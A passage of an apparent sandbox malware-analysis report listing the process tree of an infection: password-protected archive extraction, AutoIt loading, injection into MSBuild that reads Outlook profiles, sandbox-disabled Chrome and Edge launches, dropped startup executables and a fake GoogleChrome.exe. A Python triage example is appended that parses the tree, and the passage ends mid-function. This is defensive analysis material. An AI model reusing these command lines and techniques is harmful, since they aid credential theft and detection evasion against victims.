                                                                  PID:1384
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7zr.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7zr.exe" x -aoa -p"vMgXworcvLkJ+c11mCsGQ" setup.7z
                                                                    7⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4788
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe" libmmd.dll
                                                                    7⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2272
                                                                  • C:\Users\Admin\AppData\Local\Temp\10495980101\blOahSM.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10495980101\blOahSM.exe" -sfxwaitall:1 "timeout" /t 2 /nobreak
                                                                    7⤵
                                                                    • Checks computer location settings
                                                                    PID:5832
                                                                    • C:\Windows\System32\timeout.exe
                                                                      "C:\Windows\System32\timeout.exe" /t 2 /nobreak
                                                                      8⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:3016
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                    7⤵
                                                                      PID:3156
                                                                  • C:\Users\Admin\AppData\Local\Temp\10495990101\oSOnryg.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10495990101\oSOnryg.exe"
                                                                    6⤵
                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                    PID:536
                                                                  • C:\Users\Admin\AppData\Local\Temp\10496000101\4eTHv9F.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10496000101\4eTHv9F.exe"
                                                                    6⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:4184
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                      7⤵
                                                                      • Accesses Microsoft Outlook profiles
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • outlook_office_path
                                                                      • outlook_win_path
                                                                      PID:4516
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng"
                                                                        8⤵
                                                                        • Enumerates system info in registry
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:5176
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff916bdcf8,0x7fff916bdd04,0x7fff916bdd10
                                                                          9⤵
                                                                            PID:4440
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1652,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=1632 /prefetch:2
                                                                            9⤵
                                                                              PID:5852
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --field-trial-handle=1996,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:3
                                                                              9⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1172
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --field-trial-handle=2168,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:8
                                                                              9⤵
                                                                                PID:4996
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2732,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:1
                                                                                9⤵
                                                                                  PID:528
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2752,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2776 /prefetch:1
                                                                                  9⤵
                                                                                    PID:5880
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3328,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3348 /prefetch:1
                                                                                    9⤵
                                                                                      PID:4388
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3360,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3368 /prefetch:2
                                                                                      9⤵
                                                                                        PID:1056
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3396,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3436 /prefetch:1
                                                                                        9⤵
                                                                                          PID:2084
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3404,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3936 /prefetch:2
                  9⤵
                  PID:840
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=2592,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=3956 /prefetch:1
                  9⤵
                  PID:2260
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng" --field-trial-handle=3372,i,5393218465440114645,17568954219060303098,262144 --variations-seed-version --mojo-platform-channel-handle=2764 /prefetch:8
                  9⤵
                  PID:1432
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj"
                8⤵
                • Enumerates system info in registry
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:5856
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7fff8a68f208,0x7fff8a68f214,0x7fff8a68f220
                  9⤵
                  PID:5972
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2228,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:2
                  9⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3180
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=1824,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
                  9⤵
                  PID:4692
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=2284,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:8
                  9⤵
                  PID:220
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3020,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3132 /prefetch:1
                  9⤵
                  PID:2268
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --instant-process --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3092,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:1
                  9⤵
                  PID:3760
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=3612,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3624 /prefetch:1
                  9⤵
                  PID:4568
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3584,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:2
                  9⤵
                  PID:924
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=3688,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:1
                  9⤵
                  PID:4936
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=3724,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3740 /prefetch:2
                  9⤵
                  PID:6108
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=3752,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:1
                  9⤵
                  PID:3604
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=3784,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3796 /prefetch:2
                  9⤵
                  PID:4268
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3828,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3848 /prefetch:1
                  9⤵
                  PID:2132
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=3824,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3892 /prefetch:2
                  9⤵
                  PID:2764
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=3884,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3920 /prefetch:1
                  9⤵
                  PID:4508
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=3912,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=3936 /prefetch:2
                  9⤵
                  PID:3024
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=4892,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=4780 /prefetch:8
                  9⤵
                  PID:2016
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=5128,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=5196 /prefetch:8
                  9⤵
                  PID:4780
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=5364,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
                  9⤵
                  PID:5800
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj" --always-read-main-dll --field-trial-handle=5372,i,12887902026236218365,510619534126323994,262144 --variations-seed-version --mojo-platform-channel-handle=5332 /prefetch:8
                  9⤵
                  PID:4536
          • C:\Users\Admin\AppData\Local\Temp\10496010101\kI81c4U.exe
            "C:\Users\Admin\AppData\Local\Temp\10496010101\kI81c4U.exe"
            6⤵
            • Suspicious use of SetThreadContext
            PID:4684
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              7⤵
              PID:4640
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              7⤵
              PID:5936
          • C:\Users\Admin\AppData\Local\Temp\10496020101\EG11t89.exe
            "C:\Users\Admin\AppData\Local\Temp\10496020101\EG11t89.exe"
            6⤵
            • Checks computer location settings
            • Drops startup file
            • Drops file in Windows directory
            PID:4000
            • C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe
              "C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe"
              7⤵
              • Drops startup file
              • System Location Discovery: System Language Discovery
              PID:7024
          • C:\Users\Admin\AppData\Local\Temp\10496030101\texL7GT.exe
            "C:\Users\Admin\AppData\Local\Temp\10496030101\texL7GT.exe"
            6⤵
            • Suspicious use of SetThreadContext
            PID:6700
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              7⤵
              • System Location Discovery: System Language Discovery
              PID:7016
          • C:\Users\Admin\AppData\Local\Temp\10496040101\Bw5ZAOe.exe
            "C:\Users\Admin\AppData\Local\Temp\10496040101\Bw5ZAOe.exe"
            6⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:228
• C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  1⤵
  • Executes dropped EXE
  PID:6068
• C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  1⤵
  • Executes dropped EXE
  PID:3344
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\GoogleChrome.exe
  1⤵
  PID:3448
  • C:\Users\Admin\AppData\Local\GoogleChrome.exe
    C:\Users\Admin\AppData\Local\GoogleChrome.exe
    2⤵
    PID:2784
• C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
  1⤵
  PID:4084
• C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                1⤵
                                                                                                                                  PID:5844
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:6900
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:6924
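Two triage questions a reader of this tree wants answered quickly: which dropped binary ran more than once, and which process carries a browser's name without living under a browser's install root (the `cmd.exe /c C:\Users\Admin\AppData\Local\GoogleChrome.exe` launch above, next to the genuine Chrome and Edge `elevation_service.exe` under Program Files). The following is an added example, not part of the sandbox report or of any of the listed families' code: it parses the report's flattened process-tree text (reproduced inline from the entries above) into records and runs both checks over them. Two assumptions are made for the example only: the `N⤵` badge is read as the process's depth in the tree, so a parent is the nearest preceding entry one level shallower, and the browser-name list and trusted install roots used by the masquerade check are the author's own heuristic.

```python
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed input: the process tree of this report, dedented, from its first
# complete entry (the PID:228 tail above it began outside this excerpt).
TREE_TEXT = r"""
• C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  1⤵
  • Executes dropped EXE
  PID:6068
• C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  1⤵
  • Executes dropped EXE
  PID:3344
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\GoogleChrome.exe
  1⤵
  PID:3448
  • C:\Users\Admin\AppData\Local\GoogleChrome.exe
    C:\Users\Admin\AppData\Local\GoogleChrome.exe
    2⤵
    PID:2784
• C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
  1⤵
  PID:4084
• C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
  1⤵
  PID:5844
• C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
  1⤵
  PID:6900
• C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe
  C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe
  1⤵
  PID:6924
"""

BULLET_RE = re.compile(r"^•\s+(.+)$")
IMAGE_RE = re.compile(r"^[A-Za-z]:\\")  # a bullet that is a drive path opens a process entry
DEPTH_RE = re.compile(r"^(\d+)⤵$")      # the N⤵ badge, read here as tree depth (assumption)
PID_RE = re.compile(r"^PID:(\d+)$")

@dataclass
class Proc:
    image: str
    cmdline: str = ""
    depth: int = 0
    pid: int | None = None
    parent_pid: int | None = None
    signatures: list[str] = field(default_factory=list)

def parse_tree(text: str) -> list[Proc]:
    procs: list[Proc] = []
    cur: Proc | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        bullet = BULLET_RE.match(line)
        if bullet and IMAGE_RE.match(bullet.group(1)):
            cur = Proc(image=bullet.group(1))
            procs.append(cur)
        elif cur is None:
            continue  # signature/PID tail of an entry that began outside the excerpt
        elif bullet:
            cur.signatures.append(bullet.group(1))  # any other bullet is a signature hit
        elif m := DEPTH_RE.match(line):
            cur.depth = int(m.group(1))
        elif m := PID_RE.match(line):
            cur.pid = int(m.group(1))
        elif not cur.cmdline:
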